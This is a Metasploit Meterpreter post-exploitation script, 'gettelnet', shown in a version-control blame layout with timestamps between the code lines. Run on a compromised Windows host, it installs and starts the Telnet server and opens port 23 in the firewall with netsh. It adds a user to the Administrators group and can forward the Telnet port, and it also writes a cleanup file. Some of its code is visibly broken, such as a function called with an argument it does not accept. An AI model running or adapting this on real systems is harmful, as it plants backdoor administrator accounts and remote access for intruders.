2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2010-06-23 00:50:14 +00:00
|
|
|
# $Revision$
|
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
|
|
|
#-------------------------------------------------------------------------------
|
2009-03-25 03:13:54 +00:00
|
|
|
################## Variable Declarations ##################
|
2010-06-15 22:11:48 +00:00
|
|
|
@client = client
|
|
|
|
host_name = client.sys.config.sysinfo['Computer']
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
2009-03-25 03:13:54 +00:00
|
|
|
|
2010-06-15 22:11:48 +00:00
|
|
|
# Create a directory for the logs
|
2010-06-23 00:50:14 +00:00
|
|
|
logs = ::File.join(Msf::Config.log_directory,'scripts', 'gettelnet')
|
2010-06-15 22:11:48 +00:00
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
# Cleaup script file name
|
|
|
|
@dest = logs + "/clean_up_" + filenameinfo + ".rc"
|
2009-03-25 03:13:54 +00:00
|
|
|
session = client
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
2009-10-26 04:49:01 +00:00
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-e" => [ false, "Enable Telnet Server only." ],
|
|
|
|
"-p" => [ true, "The Password of the user to add." ],
|
2009-12-25 15:58:43 +00:00
|
|
|
"-u" => [ true, "The Username of the user to add." ],
|
|
|
|
"-f" => [ true, "Forward Telnet Connection." ]
|
2009-10-26 04:49:01 +00:00
|
|
|
)
|
2010-06-15 22:11:48 +00:00
|
|
|
def checkifinst()
|
2009-10-26 04:49:01 +00:00
|
|
|
# This won't work on windows 2000 since there is no sc.exe
|
2010-06-15 22:11:48 +00:00
|
|
|
print_status("Checking if Telnet is installed...")
|
|
|
|
begin
|
|
|
|
registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\","Start")
|
|
|
|
return true
|
|
|
|
rescue
|
|
|
|
return false
|
2010-05-03 17:13:09 +00:00
|
|
|
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
2010-06-15 22:11:48 +00:00
|
|
|
def insttlntsrv()
|
|
|
|
trgtos = @client.sys.config.sysinfo['OS']
|
|
|
|
if trgtos =~ /Vista|7|2008/
|
|
|
|
puts("Checking if Telnet Service is Installed")
|
|
|
|
if checkifinst()
|
2009-01-30 06:18:02 +00:00
|
|
|
print_status("Telnet Service Installed on Target")
|
2009-03-25 03:13:54 +00:00
|
|
|
else
|
2010-06-15 22:11:48 +00:00
|
|
|
print_status("Installing Telnet Server Service ......")
|
|
|
|
cmd_exec("cmd /c ocsetup TelnetServer")
|
|
|
|
prog2check = "ocsetup.exe"
|
2009-03-25 03:13:54 +00:00
|
|
|
found = 0
|
|
|
|
while found == 0
|
2010-06-15 22:11:48 +00:00
|
|
|
@client.sys.process.get_processes().each do |x|
|
2009-03-25 03:13:54 +00:00
|
|
|
found =1
|
|
|
|
if prog2check == (x['name'].downcase)
|
2010-06-15 22:11:48 +00:00
|
|
|
puts "*"
|
2009-03-25 03:13:54 +00:00
|
|
|
sleep(0.5)
|
|
|
|
found = 0
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2010-06-23 00:50:14 +00:00
|
|
|
file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"")
|
2009-03-25 15:15:56 +00:00
|
|
|
print_status("Finished installing the Telnet Service.")
|
2010-06-15 22:11:48 +00:00
|
|
|
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
elsif trgtos =~ /2003/
|
2010-06-23 00:50:14 +00:00
|
|
|
file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"")
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
end
|
2009-03-25 03:13:54 +00:00
|
|
|
#---------------------------------------------------------------------------------------------------------
|
2010-06-15 22:11:48 +00:00
|
|
|
def enabletlntsrv()
|
|
|
|
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\"
|
2009-03-25 03:13:54 +00:00
|
|
|
value2 = "Start"
|
|
|
|
begin
|
2010-06-15 22:11:48 +00:00
|
|
|
v2 = registry_getvaldata(key2,value2)
|
|
|
|
print_status "Setting Telnet Server Services service startup mode"
|
|
|
|
if v2 != 2
|
|
|
|
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
|
|
|
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
|
|
|
cmmds. each do |cmd|
|
|
|
|
cmd_exec(cmd)
|
2009-01-30 06:18:02 +00:00
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
else
|
|
|
|
print_status "\tTelnet Server Services service is already set to auto"
|
|
|
|
end
|
|
|
|
# Enabling Exception on the Firewall
|
|
|
|
print_status "\tOpening port in local firewall if necessary"
|
|
|
|
cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable')
|
|
|
|
|
2009-03-25 03:13:54 +00:00
|
|
|
rescue::Exception => e
|
2010-06-15 22:11:48 +00:00
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
2010-06-15 22:11:48 +00:00
|
|
|
def addrdpusr(username, password)
|
2009-03-25 03:13:54 +00:00
|
|
|
print_status "Setting user account for logon"
|
|
|
|
print_status "\tAdding User: #{username} with Password: #{password}"
|
|
|
|
begin
|
2010-06-15 22:11:48 +00:00
|
|
|
cmd_exec("net user #{username} #{password} /add")
|
2010-06-23 00:50:14 +00:00
|
|
|
file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
|
2010-06-15 22:11:48 +00:00
|
|
|
print_status "\tAdding User: #{username} to local group TelnetClients"
|
|
|
|
cmd_exec("net localgroup \"TelnetClients\" #{username} /add")
|
|
|
|
|
|
|
|
print_status "\tAdding User: #{username} to local group Administrators"
|
|
|
|
cmd_exec("net localgroup Administrators #{username} /add")
|
|
|
|
|
|
|
|
print_status "You can now login with the created user"
|
2009-03-25 03:13:54 +00:00
|
|
|
rescue::Exception => e
|
2010-06-15 22:11:48 +00:00
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def message
|
|
|
|
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
2009-01-30 06:18:02 +00:00
|
|
|
end
|
|
|
|
def usage
|
2009-10-26 04:49:01 +00:00
|
|
|
print_line("Windows Telnet Server Enabler Meterpreter Script")
|
|
|
|
print_line("Usage: gettelnet -u <username> -p <password>")
|
|
|
|
print_line(@@exec_opts.usage)
|
2010-06-15 22:11:48 +00:00
|
|
|
raise Rex::Script::Completed
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
################## MAIN ##################
|
|
|
|
# Parsing of Options
|
|
|
|
usr = nil
|
|
|
|
pass = nil
|
2009-12-25 15:58:43 +00:00
|
|
|
frwrd = nil
|
2009-03-25 03:13:54 +00:00
|
|
|
enbl = nil
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
2010-06-15 22:11:48 +00:00
|
|
|
when "-u"
|
|
|
|
usr = val
|
|
|
|
when "-p"
|
|
|
|
pass = val
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
when "-f"
|
|
|
|
frwrd = true
|
|
|
|
when "-e"
|
|
|
|
enbl = true
|
|
|
|
end
|
2009-03-25 03:13:54 +00:00
|
|
|
|
|
|
|
}
|
2009-10-26 04:49:01 +00:00
|
|
|
if enbl
|
2009-03-25 03:13:54 +00:00
|
|
|
message
|
|
|
|
insttlntsrv(session)
|
2010-06-15 22:11:48 +00:00
|
|
|
enabletlntsrv()
|
|
|
|
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
|
2009-03-25 03:13:54 +00:00
|
|
|
|
|
|
|
elsif usr!= nil && pass != nil
|
|
|
|
message
|
|
|
|
insttlntsrv(session)
|
2010-06-15 22:11:48 +00:00
|
|
|
enabletlntsrv()
|
|
|
|
addrdpusr(usr, pass)
|
|
|
|
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
|
2009-03-25 03:13:54 +00:00
|
|
|
|
|
|
|
else
|
|
|
|
usage
|
|
|
|
end
|
2009-12-25 15:58:43 +00:00
|
|
|
if frwrd == true
|
|
|
|
print_status("Starting the port forwarding at local port #{lport}")
|
|
|
|
client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 23 -r 127.0.0.1")
|
|
|
|
end
|